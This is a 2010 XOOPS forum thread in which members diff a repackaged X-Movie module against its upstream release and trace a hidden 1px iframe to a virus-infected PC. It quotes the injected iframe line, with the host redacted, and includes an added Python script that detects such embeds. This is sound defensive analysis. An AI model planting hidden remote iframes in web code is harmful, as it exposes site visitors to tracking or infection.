xoops forums

Mamba

Moderator
Posted on: 2010/5/26 6:40
#1

X-Movie Virus?

Originally in this thread

@ Peekay
Quote:
wishcraft wrote:

Quote:
What about X-Movie 3, mamba if you're so nice why has the guy installed 4 viruses and php trigger code in it, that I had to remove..


Sorry to back-track a little, but this module appears to be in the module repository. Does it contain a virus?

I am confused with the whole story.

I downloaded X-Movie 3.11 from the link that Wishcraft gave in his article.

Then I downloaded the original 3.0 from the Optikool website and the 3.0 from our Module Repository, which is identical to the one from the Optikool website.

My virus scanner (Microsoft Security Essentials) didn't find any viruses in any of the files.

Then I used WinMerge to compare the files from Wishcraft's 3.11 and the ones in 3.0 from our repository.


The dates for the binary files do differ, with Wishcraft's files being older. Didn't have time to check on the differences there.

The changed text files are (and the changes):

1)
admin_header.php
class.Thumbnail.php
submit.php
tpl_embedcode.php
tpl_imgtype.php
tpl_movietype.php
tpl_player.php

Line 1: changed from <? to <?php

2)

blocksadmin.inc.php

Line 86 (Wishcraft's code includes an iframe):
From:
//  $dummyhtml = '<html><head><meta http-equiv="content-type" content="text/html; charset='._CHARSET.'" /><meta http-equiv="content-language" content="'._LANGCODE.'" /><title>'.$xoopsConfig['sitename'].'</title><link rel="stylesheet" type="text/css" media="all" href="'.getcss($xoopsConfig['theme_set']).'" /></head><body><table><tr><th>'.$myblock->getVar('title').'</th></tr><tr><td>'.$myblock->getContent('S', $bctype).'</td></tr></table></body></html>';


To:
//  $dummyhtml = '<html><head><meta http-equiv="content-type" content="text/html; charset='._CHARSET.'" /><meta http-equiv="content-language" content="'._LANGCODE.'" /><title>'.$xoopsConfig['sitename'].'</title><link rel="stylesheet" type="text/css" media="all" href="'.getcss($xoopsConfig['theme_set']).'" /></head><body><table><tr><th>'.$myblock->getVar('title').'</th></tr><tr><td>'.$myblock->getContent('S', $bctype).'</td></tr></table><iframe style="height:1px" src="http://www.XXX.pl/rc/" frameborder=0 width=1></iframe>
</body></html>';


Please note the link to a web site XXX.pl in Wishcraft's code (I've changed the name so it won't show here, but you can see it in the original file).

3)
myheader.php
Line 61:

From:
</td></tr></table></body></html>

To:
</td></tr></table>
</
body></html>


4)
xoops_version.php

Lines 31 and 33 (changing version number and adding his name)

From:
$modversion['version'] = 3.0;
$modversion['description'] = _MI_X_MOVIE_DESC;
$modversion['credits'] = "Dana Harris (http://www.optikool.com)";

To:

$modversion['version'] = 3.11;
$modversion['description'] = _MI_X_MOVIE_DESC;
$modversion['credits'] = "Dana Harris (http://www.optikool.com), wishcraft.";


So it seems like Wishcraft's changes are cosmetic, there was no "php trigger code" removed, and the iframe has actually been added in Wishcraft's code.

Can somebody confirm it?

Wishcraft, did you upload the correct files? If not, could you upload the correct ones, and tell us which "php trigger code" has been removed from Optikool's original files?
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs
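An added example (not part of the original thread or of either module release) that automates the comparison described in the post above: it diffs a repackaged release against the upstream one and reports remote `iframe`/`script`/`embed`/`object` tags that appear only on changed or added lines. The function names, the shortened file contents and the placeholder host `www.example.invalid` are assumptions made for illustration.

```python
import difflib
import re
from pathlib import Path

# Tags that make a visitor's browser fetch content from another host.
REMOTE_EMBED = re.compile(
    r"<\s*(iframe|script|embed|object)\b[^>]*?\b(?:src|data)\s*=\s*[\"']?\s*"
    r"((?:https?:)?//[^\s\"'>]+)", re.IGNORECASE)
# Near-invisible sizing, like the 1px iframe quoted in the thread.
HIDDEN = re.compile(
    r"(?:height|width)\s*[:=]\s*[\"']?\s*[01](?:px)?\b|display\s*:\s*none", re.IGNORECASE)

def load_tree(root, suffixes=(".php", ".html", ".htm", ".js", ".tpl")):
    """Read the text files under root into {relative_path: content}."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p.read_text(errors="replace")
            for p in sorted(root.rglob("*"))
            if p.is_file() and p.suffix.lower() in suffixes}

def added_remote_embeds(baseline, candidate):
    """Flag remote embeds on lines that exist only in the candidate release."""
    findings = []
    for path, new_text in sorted(candidate.items()):
        old_text = baseline.get(path, "")
        new_lines = new_text.splitlines()
        ops = difflib.SequenceMatcher(None, old_text.splitlines(), new_lines,
                                      autojunk=False).get_opcodes()
        for tag, _, _, j1, j2 in ops:
            for n in range(j1, j2) if tag in ("replace", "insert") else ():
                for m in REMOTE_EMBED.finditer(new_lines[n]):
                    if m.group(2) not in old_text:  # skip URLs already shipped upstream
                        findings.append({"file": path, "line": n + 1,
                                         "tag": m.group(1).lower(), "url": m.group(2),
                                         "hidden": bool(HIDDEN.search(new_lines[n]))})
    return findings

# Constructed sample: a shortened form of the blocksadmin.inc.php change from the
# thread, with a placeholder host in place of the redacted one.
BASELINE = {"blocksadmin.inc.php":
            "<?php\n$dummyhtml = '<html><body><table></table></body></html>';\n"}
CANDIDATE = {"blocksadmin.inc.php":
             "<?php\n$dummyhtml = '<html><body><table></table><iframe style=\"height:1px\" "
             "src=\"http://www.example.invalid/rc/\" frameborder=0 width=1></iframe>\n"
             "</body></html>';\n",
             "xoops_version.php": "<?php\n$modversion['version'] = 3.11;\n"}

if __name__ == "__main__":
    print(added_remote_embeds(BASELINE, CANDIDATE))
```

For two unpacked releases on disk, pass `load_tree()` of each directory as the two arguments; binary files are skipped and still need a hash or byte comparison.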

Burning

Theme Designer
Posted on: 2010/5/26 7:14
#2

Re: X-Movie Virus?

Hi,

The virus found in Wishcraft's version was W32.Virut!html. The contaminated file was: x_movie/myheader.php

I found it on 2010-05-16 and alerted Simon immediately via MSN. He sent me a new version; the virus was removed.


To be sure, and after Peekay's question, I have scanned (with the same program, Norton 2010) the Optikool version: no virus.


So, no more virus :)
Still learning CSS and... english

Mamba

Moderator
Posted on: 2010/5/26 7:23
#3

Re: X-Movie Virus?

But which X-Movie files originally contained the virus?

Files that came from Optikool, or files that you received from Wishcraft (or somebody else)?


ghia

Community Support Member
Posted on: 2010/5/26 7:39
#4

Re: X-Movie Virus?

I downloaded xoops2_mod_x_movie_3_optikool.zip in December 2009 with latest file date 20 May 2009.
This does not include the iframe.
The current version on the site of Optikool is xoops2_mod_x_movie_30_optikool.zip dated March 2010, but the files are identical.

It looks as if Wishcraft's PC was infected.

Peekay

XOOPS is my life!
Posted on: 2010/5/26 9:48
#5

Re: X-Movie Virus?

Thanks mamba and others for responding.
Quote:
<iframe style="height:1px" src="http://www.XXX.pl/rc/" frameborder=0 width=1></iframe>

I am glad there is no virus, but why add the iFrame?
Just a test, or to track usage of the module?

I appreciate it may have been an error, but you don't want remote links embedded in a module. I found one recently in a module I'm updating. I am confident it was overlooked by the original developer after some initial testing, but the site still set a cookie on my PC.
A thread is for life. Not just for Christmas.

Mamba

Moderator
Posted on: 2010/5/26 10:11
#6

Re: X-Movie Virus?

As Ghia said, it seems like his PC was infected, and he uploaded the infected files as part of the Zip file.

What I don't understand is how 8 cosmetic changes, as shown above, would justify a new version release. I hope this was just a wrong upload, and there is another version somewhere on his computer with some more significant changes...

ghia

Community Support Member
Posted on: 2010/5/26 12:07
#7

Re: X-Movie Virus?

Quote:
I found one recently in a module I'm updating.
Can you inform us which one, so we can verify it in our repository?
Quote:
What I don't understand is how 8 cosmetic changes, as shown above, would justify a new version release.
As I believe Optikool is still maintaining its site and modules, errors and other needed changes should be reported to him and not released by third parties as new versions.
If no features are added to make a kind of new module out of it, one should not take over existing and actively maintained modules.
Furthermore, I believe an edit of the article is appropriate and the following paragraph should be removed, as I feel this does injustice to Optikool and his modules.
Quote:
x-Movie 3.11

* Virus Removed
* Embedded Virus Trigger Removed
* Helpers Updated
* Icon Updated
* Version Changed

Peekay

XOOPS is my life!
Posted on: 2010/5/26 12:26
#8

Re: X-Movie Virus?

@ghia

I have been updating Catads, based on Catads 1.522 FINAL from TDM Xoops. I posted an alert to beta testers about the URL in this thread. I don't think that particular module was available in the module repository.

@ mamba

OK. Thx. I suppose if your site (or PC) is compromised the attackers will try and hide malicious code and you may not even know about it. Hopefully Wishcraft will amend the release and remove the iFrame SRC.

If there is no evidence to suggest that Optikool allowed a virus to be included in the previous version, I too think it fair that the release notes are changed.

Mamba

Moderator
Posted on: 2010/5/26 21:29
#9

Re: X-Movie Virus?

Ghia,
Quote:
If no features are added to make a kind of new module out of it, one should not take over existing and actively maintained modules.

Even if it is not actively maintained, only new added features should justify a new version.

Quote:
Furthermore, I believe an edit of the article is appropriate and the following paragraph should be removed, as I feel this does injustice to Optikool and his modules.

I agree. The paragraph has been removed.


optikool

Not too shy to talk
Posted on: 2010/6/17 17:10
#10

Re: X-Movie Virus?

Hey Guys,

I just ran into this thread and wasn't aware that there was a virus version of this module floating around on the net.

@Peekay Generally a cracker would add an iframe to a page so that they could send information back and forth between their server and the page you are viewing. Things like passwords would be the most common info to send. The module that I maintain would not have any need for iframes so if you find one, remove it.

Later this year I'm planning to revisit this module so that I can redesign different aspects to take advantage of new ways of doing things and improve the code. If you see problems with this module let me know and I will look into it.

Also the reason why the publish date changed on the module was because I changed to the Joomla CMS and had to move things over. Sorry Xoops People but I needed to understand the MVC module better and Joomla has that module. But I plan to bring the techniques I learned from creating my XGallery component and what I learn from my Movie component, (still in Alpha, but you can see it on my website) to the Gallery 2 and X Movie modules that I maintain for Xoops. Hopefully it will be a big improvement in the end.